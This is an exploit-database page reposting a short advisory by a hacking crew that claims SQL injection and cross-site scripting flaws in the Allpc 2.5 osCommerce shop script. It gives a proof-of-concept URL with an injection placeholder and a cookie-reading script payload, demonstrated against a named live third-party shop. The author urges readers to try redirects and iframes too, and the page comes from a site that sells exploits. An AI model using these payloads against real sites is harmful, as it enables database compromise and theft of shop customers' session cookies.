0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities
===================================================== Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################### 1 0 I'm **RoAd_KiLlEr** member from Inj3ct0r Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+]Title Allpc 2.5 osCommerce SQL-i/XSS Multiple Vulnerabilities [+]Author **RoAd_KiLlEr** [+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Tested on Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Version: 2.5 [~] Vendor: http://www.allpcscript.com ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+]Description: Compatible with all versions of PHP 4 and above. It uses a database MySQL. It works in 4 languages, which are easily replaced in the administration panel. * Appearance: - The client part - Administration * Install / Installation - Simple automatic installation via the web-browser * Design / Placement - A simple change of patterns - Support for dynamic images * Administration / Functional - Supports unlimited products and categories The structure of products in categories The structure of the categories to the categories - Add / edit / delete categories, products, manufacturers, customers, and reviews - Support for physical (shippable) and virtual (zagruzhaemye) products - Land Administration is protected with username and password - Contact customers directly via email or contact the user - Easy to book and restore the database - Print invoices and packaging lists from the order - Statistics for products and customers - Multilingual support - Support the use of multiple currencies - Automatic exchange rates - Select what to display, and in what order the product that make the list page - Support for static and dynamic banners with full statistics ========================================= [+]. SQL-i Vulnerability =+=+=+=+=+=+=+=+=+ [P0C]: http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection] [DemO]: http://127.0.0.1/allpc25free/product_info.php?products_id=[SQL Injection] [+]. XSS Vulnerability =+=+=+=+=+=+=+=+= The Search B0x of this script is vulnerable to XSS,because it fails to properly sanitize the response. By submitting a malicious input to the web site, the user would only be able to compromise their security.That is their own browser cookies, cache objects, and so forth. [DemO]: http://neways4u.com/advanced_search_result.php?keywords=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E [Atack Pattern]: "><script>alert(document.cookie)</script> I used this pattern to show you that is vulnerable,but you can try HTML Injection,Url Redirect, Iframe,Etc.. Basically Your own Imagination is your Limit.. Good Luck :P =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | The|DennY` | EaglE EyE | THE_1NV1S1BL3 & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: r0073r | indoushka | Sid3^effects| L0rd CruSad3r | SONIC | MaFFiTeRRoR | All Inj3ct0r.com Members | And All My Friendz =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN =========================================================================================== # 0day.today [2024-09-28] #